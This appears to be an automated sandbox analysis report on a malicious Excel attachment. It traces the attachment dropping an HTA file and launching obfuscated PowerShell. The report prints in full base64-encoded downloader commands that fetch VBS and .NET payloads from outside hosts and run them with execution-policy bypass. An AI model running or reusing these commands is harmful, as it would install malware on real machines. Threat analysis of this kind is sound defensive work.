      Source: 73B30000.0.drOLE: Microsoft Excel 2007+
      Source: 73B30000.0.drOLE: Microsoft Excel 2007+
      Microsoft Office drops suspicious files
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].htaJump to behavior
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE89A6352E8_2_000007FE89A6352E
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_000007FE89A97FC615_2_000007FE89A97FC6
      Source: Swiftcopy.xla.xlsxOLE indicator, VBA macros: true
      Source: Swiftcopy.xla.xlsxStream path 'MBD003994AC/\x1Ole' : https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroomB>EOxdsXQo'8]q`I3A$WUp6-av[B:M70l'}N>5r)'E#vXAGr`IJ)J-0J3/Cp}[6=<:s(IiHzd$VtyiN8ABuRZC3CbTyxC8cRUBpr6VOMlytfqsT22wCOz34yQV1WnSDr57SDsnn\T$=Bv9C@7z
      Source: 73B30000.0.drStream path 'MBD003994AC/\x1Ole' : https://ljg.cl/G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroomB>EOxdsXQo'8]q`I3A$WUp6-av[B:M70l'}N>5r)'E#vXAGr`IJ)J-0J3/Cp}[6=<:s(IiHzd$VtyiN8ABuRZC3CbTyxC8cRUBpr6VOMlytfqsT22wCOz34yQV1WnSDr57SDsnn\T$=Bv9C@7z
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2466
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2466Jump to behavior
      Source: Process Memory Space: powershell.exe PID: 3044, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 2036, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Swiftcopy.xla.xlsx, 73B30000.0.drBinary or memory string: .vBP$
      Source: classification engineClassification label: mal100.phis.expl.evad.winXLSX@16/29@6/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Swiftcopy.xla.xlsxJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8F15.tmpJump to behavior
      Source: Swiftcopy.xla.xlsxOLE indicator, Workbook stream: true
      Source: 73B30000.0.drOLE indicator, Workbook stream: true
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................@...............Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....@.......\.......................(.P.....,.......<.......(...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w............X8h........l....X.g.....(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....@.......\.......................(.P.....,.......<.......(...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w............X8h........l....X.g.....(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.X8h........l....X.g.....(.P.....,.......<............... .......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w............X8h........l....X.g.....(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....,.......<...............8.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w............X8h........l....X.g.....(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...<...............F.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.......}..w............X8h........l....X.g.....(.P.....,.......<...............l.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.......}..w............X8h........l....X.g.....(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................@...............0....Z...Wl.....}..w....(.......@E......^...............(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................@....................Z...Wl.....}..w....(.......@E......^...............(.P.....,.......<.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................F..............Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.....F......\.......................(.P.............(.......HH..............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....?..l.....0......(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.....F......\.......................(.P.............(.......HH..............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.3.3.....?..l.....0......(.P.............(........G......$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....?..l.....0......(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....?..l.....0......(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....?..l.....0......(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....?..l.....0......(.P.............(...............T.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia.....?..l.....0......(.P.............(........G..............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....O..l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................P.a.r.a.m.e.t.e.r. .n.a.m.e.:. .b.y.t.e.s."......Wr.....(.P.............(.......8.......,.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.3.....O..l.....Wr.....(.P.............(.......8.......$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....O..l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....O..l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....O..l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia.....O..l.....Wr.....(.P.............(...............f.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia.....O..l.....Wr.....(.P.............(.......8...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(...............j.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................_,.l....}..w.....F......\.......................(.P.............(.......h...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.1.3......,.l.....Wr.....(.P.............(...............$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................_,.l....}..w.....F......\.......................(.P.............(.......h...............................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(...............j.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.0......,.l.....Wr.....(.P.............(...............$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......,.l.....Wr.....(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia......,.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................F..............F.a.l.s.e.l.....}..w....X.......@E......^...............(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................F..................l.s.e.l.....}..w....X.......@E......^...............(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(...............j.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................+.l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.1.6......+.l.....Wr.....(.P.............(...............$.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................+.l....}..w.....F......\.......................(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia......+.l.....Wr.....(.P.............(...............`.......................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........F......}..w............Pia......+.l.....Wr.....(.P.............(.......................................Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................F......}..w............Pia........l.....Wr.....(.P.............(...............j.......................Jump to behavior
